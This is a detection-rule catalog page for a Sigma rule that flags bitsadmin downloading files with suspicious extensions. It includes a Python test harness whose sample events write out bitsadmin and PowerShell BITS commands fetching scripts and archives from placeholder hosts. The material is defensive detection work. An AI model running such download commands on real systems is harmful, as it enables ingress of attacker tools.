
File With Suspicious Extension Downloaded Via Bitsadmin

Severity: high
Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Source: upstream

Detects usage of bitsadmin downloading a file with a suspicious extension

MITRE ATT&CK coverage

Tactic            | Techniques
Persistence       | T1197 BITS Jobs
Defense Evasion   | T1036.003 Masquerading: Rename Legitimate Utilities, T1197 BITS Jobs
Command & Control | T1105 Ingress Tool Transfer

Event coverage

Provider | Event ID | Title
Sysmon   | 1        | Process creation

Stages and Predicates

Stage 1: all of selection_img

or:
Image|endswith: '\bitsadmin.exe'
OriginalFileName: bitsadmin.exe

Stage 2: all of selection_flags

or:
CommandLine|contains: ' /addfile '
CommandLine|contains: ' /create '
CommandLine|contains: ' /transfer '

Stage 3: all of selection_extension

or:
CommandLine|contains: .7z
CommandLine|contains: .asax
CommandLine|contains: .ashx
CommandLine|contains: .asmx
CommandLine|contains: .asp
CommandLine|contains: .aspx
CommandLine|contains: .bat
CommandLine|contains: .cfm
CommandLine|contains: .cgi
CommandLine|contains: .chm
CommandLine|contains: .cmd
CommandLine|contains: .dll
CommandLine|contains: .gif
CommandLine|contains: .jpeg
CommandLine|contains: .jpg
CommandLine|contains: .jsp
CommandLine|contains: .jspx
CommandLine|contains: .log
CommandLine|contains: .png
CommandLine|contains: .ps1
CommandLine|contains: .psm1
CommandLine|contains: .rar
CommandLine|contains: .scf
CommandLine|contains: .sct
CommandLine|contains: .txt
CommandLine|contains: .vbe
CommandLine|contains: .vbs
CommandLine|contains: .war
CommandLine|contains: .wsf
CommandLine|contains: .wsh
CommandLine|contains: .xll
CommandLine|contains: .zip
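The three stages combine as `all of selection_*`: an event must satisfy every selection, and each selection is an OR over its own values. The following is an added example, not code from the rule or its authors: a plain-Python evaluation of those three selections over constructed Sysmon Event ID 1 records. The hostnames, URLs, paths and event ids are invented for the demonstration. It reproduces the two Sigma details that matter here: string modifiers are case-insensitive by default, and the `selection_flags` values keep their surrounding spaces. The samples include a renamed copy of the binary (caught through `OriginalFileName`), a benign `/list` call, and a `.txt` download that still matches because the extension list is intentionally broad.

```python
"""Added example: evaluates the Sigma rule's three selections against
constructed Sysmon Event ID 1 records. Not the rule's own code."""

# Values copied from the rule. Sigma string comparisons are case-insensitive
# by default, and the flag values keep their leading/trailing spaces.
SELECTION_IMG_ENDSWITH = "\\bitsadmin.exe"
SELECTION_IMG_ORIGINAL = "bitsadmin.exe"
SELECTION_FLAGS = (" /addfile ", " /create ", " /transfer ")
SELECTION_EXTENSION = (
    ".7z", ".asax", ".ashx", ".asmx", ".asp", ".aspx", ".bat", ".cfm", ".cgi",
    ".chm", ".cmd", ".dll", ".gif", ".jpeg", ".jpg", ".jsp", ".jspx", ".log",
    ".png", ".ps1", ".psm1", ".rar", ".scf", ".sct", ".txt", ".vbe", ".vbs",
    ".war", ".wsf", ".wsh", ".xll", ".zip",
)


def sigma_contains(value: str, needle: str) -> bool:
    """Sigma 'contains' modifier: case-insensitive substring test."""
    return needle.lower() in value.lower()


def sigma_endswith(value: str, suffix: str) -> bool:
    """Sigma 'endswith' modifier: case-insensitive suffix test."""
    return value.lower().endswith(suffix.lower())


def matches_rule(event: dict) -> bool:
    """condition: all of selection_* -- every selection must match; each
    selection is an OR over its own list of values."""
    image = event.get("Image", "")
    original = event.get("OriginalFileName", "")
    cmd = event.get("CommandLine", "")
    selection_img = (
        sigma_endswith(image, SELECTION_IMG_ENDSWITH)
        or original.lower() == SELECTION_IMG_ORIGINAL
    )
    selection_flags = any(sigma_contains(cmd, f) for f in SELECTION_FLAGS)
    selection_extension = any(sigma_contains(cmd, e) for e in SELECTION_EXTENSION)
    return selection_img and selection_flags and selection_extension


# Constructed Sysmon Event ID 1 records (hypothetical hosts, paths and URLs).
SAMPLE_EVENTS = [
    {   # plain transfer of a script; mixed case on the switch
        "id": "ev1",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /Transfer upd /download /priority high "
                       r"http://files.example.invalid/update.ps1 C:\Users\Public\update.ps1",
    },
    {   # renamed binary: Image misses, OriginalFileName still identifies it (T1036.003)
        "id": "ev2",
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"svc.exe /addfile dljob http://files.example.invalid/pkg.zip C:\Temp\pkg.zip",
    },
    {   # benign enumeration: no transfer switch, no listed extension
        "id": "ev3",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin.exe /list /allusers",
    },
    {   # a .txt download still matches: the extension list is deliberately broad
        "id": "ev4",
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"bitsadmin.exe /transfer docs http://intranet.example.invalid/readme.txt C:\Temp\readme.txt",
    },
    {   # a different process using BITS: selection_img fails, so no match
        "id": "ev5",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -c Start-BitsTransfer -Source "
                       "http://files.example.invalid/tool.ps1 -Destination C:\\Temp\\tool.ps1",
    },
]


def evaluate_samples(events=SAMPLE_EVENTS) -> dict:
    """Return {event id: rule matched} for a list of process-creation records."""
    return {e["id"]: matches_rule(e) for e in events}


if __name__ == "__main__":
    for event_id, hit in evaluate_samples().items():
        print(f"{event_id}: {'ALERT' if hit else 'no match'}")
```

Two things the run makes visible: ev5 shows that the rule is scoped to the bitsadmin binary itself and says nothing about BITS transfers started through other tooling, and ev4 shows why the `.txt` and `.log` entries in the extension list will fire on ordinary document downloads, so triage should look at the source URL and destination path of the job rather than the extension alone.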

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely used, community-vetted indicators; a blank or a count of 1 means the indicator is specific to this rule.

Field | Kind | Values
CommandLine | match
  • /addfile corpus 5 (sigma 5)
  • /create corpus 14 (sigma 14)
  • /transfer corpus 5 (sigma 5)
  • .7z corpus 2 (sigma 2)
  • .asax
  • .ashx
  • .asmx
  • .asp
  • .aspx
  • .bat corpus 8 (sigma 8)
  • .cfm
  • .cgi
  • .chm corpus 2 (sigma 2)
  • .cmd corpus 5 (sigma 5)
  • .dll corpus 15 (sigma 15)
  • .gif corpus 6 (sigma 6)
  • .jpeg corpus 6 (sigma 6)
  • .jpg corpus 7 (sigma 7)
  • .jsp
  • .jspx
  • .log corpus 2 (sigma 2)
  • .png corpus 7 (sigma 7)
  • .ps1 corpus 3 (sigma 3)
  • .psm1
  • .rar corpus 2 (sigma 2)
  • .scf
  • .sct
  • .txt corpus 7 (sigma 7)
  • .vbe corpus 4 (sigma 4)
  • .vbs corpus 5 (sigma 5)
  • .war
  • .wsf corpus 2 (sigma 2)
  • .wsh corpus 2 (sigma 2)
  • .xll
  • .zip corpus 4 (sigma 4)
Image | ends_with
  • \bitsadmin.exe corpus 23 (sigma 23)
OriginalFileName | eq
  • bitsadmin.exe corpus 9 (sigma 9)